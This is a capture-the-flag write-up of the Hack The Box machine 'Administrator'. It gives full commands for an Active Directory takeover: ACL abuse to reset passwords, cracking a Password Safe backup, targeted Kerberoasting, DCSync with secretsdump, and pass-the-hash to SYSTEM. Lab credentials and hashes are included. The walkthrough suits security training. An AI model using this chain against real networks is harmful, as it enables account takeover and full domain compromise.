![[Hack The Box/Administrator/IntroImage.png]]

## Summary of Exploitation

Hey all! Today I pwned Administrator from Hack The Box. This was an awesome machine. I started with provided credentials for a low-privilege user. After thorough enumeration, I was able to pivot from Olivia to another user, then to another user that had FTP access. Inside the FTP directory was a password-vault backup; cracking its master password gave me the password of yet another user. Afterwards, I was able to do a targeted Kerberoast attack and take over the final user, who had DCSync rights, leading to NT AUTHORITY\SYSTEM.

## Recon Phase

As always, I start with my tried and true nmap scan!

```
sudo nmap -sC -sV -p- --min-rate 10000 10.129.193.174 -oA nmap-out
```

![[Hack The Box/Administrator/nmap.png]]

| Port | Protocol | Protocol Details |
| ---- | -------- | ---------------- |
| 21   | FTP      | Microsoft ftpd   |
| 53   | DNS      | Simple DNS Plus  |
| 88   | Kerberos | Kerberos         |
| 135  | RPC      | RPC              |
| 139  | NETBIOS  | NETBIOS          |
| 389  | LDAP     | LDAP             |
| 445  | SMB      | SMB              |

This appears to be a surprisingly tame Windows Domain Controller, with the exception of the FTP port. The domain is administrator.htb. I'm going to go ahead and add the domain to my /etc/hosts file.

![[Hack The Box/Administrator/etcHosts.png]]

In the "Machine Information" panel, I was given a user account: olivia / ichliebedich. I'm going to immediately use these credentials to dump all the LDAP information and set up BloodHound.

```
ldapdomaindump -u administrator.htb\\Olivia -p ichliebedich 10.129.193.174 -o .
```

![[Hack The Box/Administrator/ldapdump.png]]

I'll check out the domain_users.html file and see what we are dealing with.

![[Hack The Box/Administrator/users.png]]

Looks like I have 6 active users; I believe this machine is Mission Impossible themed. The last one I did was "The Office" themed. I'm going to add these active users to my users.txt file.
![[Hack The Box/Administrator/usersText.png]]

Now I'm going to collect all my BloodHound information using bloodhound-python.

```
bloodhound-python -c ALL -u olivia -p ichliebedich -d administrator.htb -dc administrator.htb -ns 10.129.193.174
```

![[bloodhoundInfo.png]]

I'll start up my neo4j server, launch BloodHound and import all my collected data.

```
sudo neo4j start
bloodhound
```

![[uploadBLood.png]]

I'll take a look at what Olivia has to offer and I immediately find my path.

![[bloodhoundPath.png]]

Olivia has GenericAll on Michael; I can leverage this to change his password, thus taking over his account. Michael then has ForceChangePassword on Benjamin. But wait! It gets better!

![[EmilyGenWrite.png]]

Emily has GenericWrite on Ethan. I can leverage that to write an SPN onto his account and do a targeted Kerberoast attack on Ethan.

![[EthanDcSync.png]]

And Ethan has DCSync on the domain. So, done deal. Let's see what we can do...

![[crackknuckles.gif]]

## PrivEsc to Emily

I'll start with compromising Michael's account using impacket. First I make Olivia the owner of Michael's user object.

```
impacket-owneredit -action write -new-owner 'olivia' -target-dn 'CN=MICHAEL WILLIAMS,CN=USERS,DC=ADMINISTRATOR,DC=HTB' 'administrator.htb'/'olivia':'ichliebedich' -dc-ip 10.129.193.174
```

![[ownerMike.png]]

I'm going to use impacket again to write the ACL, granting Olivia FullControl over the object.

```
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia' -target-dn 'CN=MICHAEL WILLIAMS,CN=USERS,DC=ADMINISTRATOR,DC=HTB' 'administrator.htb'/'olivia':'ichliebedich' -dc-ip 10.129.193.174
```

![[dacl.png]]

And lastly, use net rpc to set the new password. Strictly speaking, GenericAll already includes the Reset Password right, so this step alone would have worked; taking ownership and writing FullControl first just makes Olivia's control over the object explicit.

```
net rpc password michael 'password123*' -U administrator.htb/olivia%'ichliebedich' -S 10.129.193.174
```

I'll get nothing back, but if I verify the new credentials with netexec, they work fine :)

![[mikeHacked.png]]

Now I can get Benjamin, but this time I can cut out the middleman and use net rpc directly, since ForceChangePassword is exactly the right that a password reset needs.
```
net rpc password benjamin 'password123*' -U administrator.htb/michael%'password123*' -S 10.129.193.174
```

I will again get nothing back, but no news is good news!

![[BenjaminHacked.png]]

After some light recon, I recalled the FTP port and tried Benjamin's credentials.

```
> ftp 10.129.193.174
Connected to 10.129.193.174.
220 Microsoft FTP Service
Name (10.129.193.174:kali): Benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||62551|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
```

Nice! There is a psafe3 file in here. A .psafe3 file is a Password Safe database, similar to a KeePass database, and hashcat can attack its master password directly (mode 5200) without any extraction step. I'll `get` the file and try to crack it.

```
hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
```

![[CrackedKee.png]]

It cracked to "tekieromucho". I went ahead and downloaded the Linux build of Password Safe from [here](https://sourceforge.net/projects/passwordsafe/files/Linux/) and loaded it up, passing the backup file and the cracked password.

![[passwordSafe.png]]

I clicked OK, and I was in!

![[passwordSafeIn.png]]

I wanted Emily's password, so I copied it to my clipboard and pasted it into my password file.

![[passwordFile.png]]

## PrivEsc to NT AUTHORITY\SYSTEM

Now that I have Emily, I can focus on getting Ethan using a targeted Kerberoast attack: GenericWrite lets Emily set a servicePrincipalName on Ethan's account, and once an account has an SPN any domain user can request a service ticket for it that is encrypted with Ethan's password hash and can be cracked offline. It's easiest to do this logged in via Evil-WinRM.

```
evil-winrm -i 10.129.193.174 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
```

![[winrmEmily.png]]

I'm going to need PowerView.ps1 for this, so I'll copy it to the directory I launched my WinRM session from (the `cp` runs on my Kali box) and use the Evil-WinRM upload feature (the `upload` runs inside the session).

```
cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
upload PowerView.ps1
```

![[uploadSucess.png]]

I'll import the module (dot-sourcing it does the same thing).

```
*Evil-WinRM* PS C:\Users\emily\Documents> Import-Module ./PowerView.ps1
*Evil-WinRM* PS C:\Users\emily\Documents> . ./PowerView.ps1
```

Now to pull this off, I'll first need to add an SPN to Ethan's account.

```
*Evil-WinRM* PS C:\Users\emily\Documents> setspn -a MSSQLSvc/administrator.htb:1433 administrator.htb\ethan
Checking domain DC=administrator,DC=htb

Registering ServicePrincipalNames for CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
        MSSQLSvc/administrator.htb:1433
Updated object
```

I can verify with Get-DomainUser.

```
*Evil-WinRM* PS C:\Users\emily\Documents> Get-DomainUser ethan | Select serviceprincipalname

serviceprincipalname
--------------------
MSSQLSvc/administrator.htb:1433
```

Now I can request a ticket using Get-DomainSPNTicket and Emily's credentials.

```
$pass = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $pass)
Get-DomainSPNTicket -SPN "MSSQLSvc/administrator.htb:1433" -Credential $cred
```

![[ticket.png]]

Nice, I got Ethan's ticket. Now I cross my fingers and hope it cracks!

```
echo '$krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQLSvc/administrator.htb:1433*$E50706B0C6CC....' > ethan.hash
hashcat -m 13100 -a 0 ethan.hash /usr/share/wordlists/rockyou.txt
```

![[CrackedEthan.png]]

Put yo hands up! limpbizkit. Since Ethan has DCSync rights, I can use impacket-secretsdump to replicate the Administrator's NTLM hash straight out of the DC.

```
impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.193.174
```

![[AllThere.png]]

All I need is this: "aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e". I can pass the hash using impacket-psexec to get NT AUTHORITY\SYSTEM.

```
impacket-psexec administrator.htb/administrator@10.129.193.174 -hashes "aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e" -dc-ip 10.129.193.174
```

![[DoneAndDone.png]]

And grab the user and root flags.
```
C:\Windows\system32> type C:\users\emily\desktop\user.txt
bbb43a**************************
C:\Windows\system32> type C:\users\administrator\desktop\root.txt
634122**************************
```

Done and done! This was a fun machine. GenericWrite can be a pain if you can't find the way forward, but I got lucky that the Kerberos ticket was crackable. Anyways, thanks for reading! Happy Hacking!